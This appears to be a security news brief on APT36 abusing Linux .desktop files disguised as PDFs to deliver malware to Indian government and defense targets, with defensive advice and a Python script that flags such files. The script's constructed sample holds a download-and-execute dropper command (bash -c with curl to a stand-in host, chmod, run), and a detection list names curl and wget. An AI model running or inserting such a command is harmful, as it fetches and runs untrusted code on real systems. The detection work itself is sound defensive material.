APT36 hackers abuse Linux .desktop files to install malware in new attacks

What’s new: APT36, a Pakistani cyber espionage group, is exploiting Linux .desktop files to deploy malware in attacks targeting Indian government and defense entities. The attacks, which began on August 1, 2025, involve phishing emails containing malicious .desktop files disguised as PDF documents. These files execute hidden commands to download and run a Go-based ELF executable for data exfiltration and persistent access.

Who’s affected

Government and defense organizations in India are the primary targets of these attacks, which aim to establish persistent espionage access.

What to do

  • Educate users about the risks of opening unexpected email attachments, especially those disguised as common file types.
  • Implement security measures to monitor and restrict the execution of .desktop files on Linux systems.
  • Regularly update and patch systems to mitigate vulnerabilities that could be exploited by such malware.
  • Consider using endpoint detection and response (EDR) solutions that can identify and respond to unusual file behavior.
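One way to act on the monitoring advice above is to triage .desktop files for the pattern this report describes (a document-looking launcher whose Exec line downloads and runs a binary). The script below is an added example, not code from the report or from any vendor; its heuristics, viewer list and sample entries are constructed for illustration and are not APT36 indicators.

```python
"""Flag .desktop files that look like document lookalikes carrying a
download-and-execute payload. Heuristics and samples are constructed."""
import re
import shlex
from pathlib import Path

SHELLS = {"sh", "bash", "dash", "zsh"}
DOWNLOADERS = {"curl", "wget"}
DOC_SUFFIXES = (".pdf", ".doc", ".docx")
VIEWERS = {"xdg-open", "evince", "okular", "libreoffice"}  # assumed benign viewers

def parse_desktop(text: str) -> dict:
    """Return key=value pairs from the [Desktop Entry] group of a .desktop file."""
    entries, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
        elif in_group and "=" in line and not line.startswith("#"):
            key, _, value = line.partition("=")
            entries[key.strip()] = value.strip()
    return entries

def suspicious_reasons(entries: dict) -> list:
    """Explain why a parsed entry looks like a disguised dropper; [] means clean."""
    exec_line = entries.get("Exec", "")
    try:
        argv = shlex.split(exec_line)
    except ValueError:
        return ["Exec line could not be tokenised"]
    program = Path(argv[0]).name if argv else ""
    words = set(re.findall(r"[A-Za-z0-9_.+-]+", exec_line))
    reasons = []
    if program in SHELLS and "-c" in argv:
        reasons.append("Exec runs an inline shell command")
    if words & DOWNLOADERS:
        reasons.append("Exec fetches remote content with curl/wget")
    if "chmod" in words:
        reasons.append("Exec changes file permissions (staging a downloaded binary)")
    looks_like_doc = (entries.get("Name", "").lower().endswith(DOC_SUFFIXES)
                      or "pdf" in entries.get("Icon", "").lower())
    if looks_like_doc and program not in VIEWERS:
        reasons.append("presents as a document but Exec is not a document viewer")
    return reasons

# Constructed samples: a PDF-lookalike dropper and a benign launcher.
LOOKALIKE = ("[Desktop Entry]\nType=Application\nName=Agenda.pdf\nIcon=application-pdf\n"
             'Exec=bash -c "curl -s http://placeholder.invalid/p -o /tmp/.p; '
             'chmod +x /tmp/.p; /tmp/.p &"\n')
BENIGN = "[Desktop Entry]\nType=Application\nName=Document Viewer\nIcon=evince\nExec=evince %U\n"

if __name__ == "__main__":
    for label, text in (("lookalike", LOOKALIKE), ("benign", BENIGN)):
        print(label, suspicious_reasons(parse_desktop(text)) or ["clean"])
```

To sweep a host, call `suspicious_reasons(parse_desktop(p.read_text()))` for each `p` in `Path.home().rglob("*.desktop")` and review anything that returns a non-empty list.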

Sources